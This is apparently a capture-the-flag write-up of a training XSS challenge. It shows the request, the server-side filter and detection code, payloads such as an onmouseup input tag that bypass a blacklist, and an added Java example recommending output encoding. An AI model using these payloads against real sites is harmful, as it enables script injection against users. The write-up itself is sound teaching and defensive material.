
Cross Site Scripting Two (cross-site scripting attack 2)

Challenge description

An XSS injection point; the task is to submit a payload that gets past the check.

Implementation

Request packet

POST /challenges/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888 HTTP/1.1

searchTerm=%3Cimg+src%3D%23+onerror%3Dalert(1)+%3E&csrfToken=22792033228396859635296159069930202705

The searchTerm value URL-decodes to <img src=# onerror=alert(1) >. The corresponding server-side code is in src/main/java/servlets/module/challenge/XssChallengeTwo.java:

String searchTerm = request.getParameter("searchTerm");
log.debug("User Submitted - " + searchTerm);
searchTerm = XssFilter.levelTwo(searchTerm);   // level-two XSS filter (its source is not shown in this writeup)
log.debug("After Filtering - " + searchTerm);
String htmlOutput = new String();
if (FindXSS.search(searchTerm))  // run the detection check on the filtered string
{
    htmlOutput = "<h2 class='title'>" + bundle.getString("result.wellDone") + "</h2>" +
            "<p>" + bundle.getString("result.youDidIt") + "<br />" +
            bundle.getString("result.resultKey") + " <a>" +
            Hash.generateUserSolution(
                    Getter.getModuleResultFromHash(getServletContext().getRealPath(""), levelHash),
                    (String) ses.getAttribute("userName")
            ) +
            "</a>";
    log.debug(levelName + " completed");
}

// Fragment of FindXSS.search(); the writeup stops after the Tidy normalisation step.
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import org.w3c.tidy.Tidy;

// inside class FindXSS
public static boolean search(String xssString)
{
    boolean xssDetected = false;
    log.debug("String to Search: " + xssString);

    // Need to tidy submitted string, similar to how a browser would when it interprets it
    Tidy tidy = new Tidy();
    tidy.setXHTML(true);  // normalise to XHTML (the filtering step)
    tidy.setQuiet(true);
    tidy.setShowWarnings(false);
    InputStream inputStream = new ByteArrayInputStream(xssString.getBytes());
    ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
    tidy.parseDOM(inputStream, outputStream);
    String tidyHtml = outputStream.toString().toLowerCase();
    try
    {
        outputStream.close();
        inputStream.close();
    }
    catch (Exception e)
    {
        log.error("Could not Close Tidy Input/Output Streams: " + e.toString());
    }

    // ... the detection logic that inspects tidyHtml is not reproduced in the writeup;
    // the return is added here so the fragment compiles
    return xssDetected;
}


The check runs on the tidied (browser-normalised) output: if, after XssFilter.levelTwo has run, the string still contains an alert that would execute, the challenge is marked as solved.

Solution steps

Official answer

<input type="button" onmouseup="alert('XSS')"/>

Summary

Writing filters against XSS is very hard. For non-rich-text input, encode the value at the output point wherever possible, or use a well-established, vetted library to do it.
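The following Java program is an added example and is not code from the writeup or from the Security Shepherd project. It puts the two approaches the page contrasts side by side: a hypothetical token-stripping filter (naiveBlacklist, a stand-in for XssFilter.levelTwo, whose source the page does not show) versus HTML entity encoding at the output point, which is what the summary recommends. containsEventHandler is a small analogue of the FindXSS.search check described above: it reports whether the rendered HTML still holds a real tag with an on* attribute. The class and method names, and the regular expression, are assumptions made for this example; the two payloads are the ones that appear on this page.

```java
import java.util.regex.Pattern;

public class SafeSearchOutput {

    // HTML entity encoding for a value placed in an HTML text context.
    // The five characters below are the ones that can change HTML structure.
    static String htmlEncode(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Hypothetical blacklist standing in for XssFilter.levelTwo, whose source the
    // writeup does not show. It strips two well-known tokens and nothing else.
    static String naiveBlacklist(String s) {
        return s.replaceAll("(?i)<script", "").replaceAll("(?i)onerror", "");
    }

    // The challenge's approach: filter, then concatenate the result into the page.
    static String renderWithBlacklist(String term) {
        return "<p>You searched for: " + naiveBlacklist(term) + "</p>";
    }

    // The summary's approach: encode at the output point, no blacklist needed.
    static String renderEncoded(String term) {
        return "<p>You searched for: " + htmlEncode(term) + "</p>";
    }

    // Small analogue of FindXSS.search: does the rendered HTML still contain a real
    // tag carrying an on* event-handler attribute? Entity-encoded text contains no
    // '<', so it can never match.
    private static final Pattern EVENT_HANDLER =
            Pattern.compile("<[a-zA-Z][^>]*\\bon[a-zA-Z]+\\s*=", Pattern.CASE_INSENSITIVE);

    static boolean containsEventHandler(String html) {
        return EVENT_HANDLER.matcher(html).find();
    }

    public static void main(String[] args) {
        // The two payloads that appear in the writeup: the submitted searchTerm
        // (URL-decoded) and the official answer.
        String[] payloads = {
            "<img src=# onerror=alert(1) >",
            "<input type=\"button\" onmouseup=\"alert('XSS')\"/>"
        };
        for (String p : payloads) {
            String filtered = renderWithBlacklist(p);
            String encoded = renderEncoded(p);
            System.out.println("payload:    " + p);
            System.out.println("blacklist:  " + filtered
                    + "\n            handler survives? " + containsEventHandler(filtered));
            System.out.println("encoded:    " + encoded
                    + "\n            handler survives? " + containsEventHandler(encoded));
            System.out.println();
        }
    }
}
```

Run it with javac/java. The blacklist happens to neutralise the first payload (it strips onerror) but lets the official answer's onmouseup handler through, which is exactly the gap the challenge exploits; the encoded rendering has no surviving handler for either input because every '<' has become &lt;. In a real servlet the same effect is obtained by passing searchTerm through a maintained encoder (for example OWASP Java Encoder's forHtml) rather than a hand-written one, and by choosing the encoder for the context the value lands in (HTML body, attribute, JavaScript, URL).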
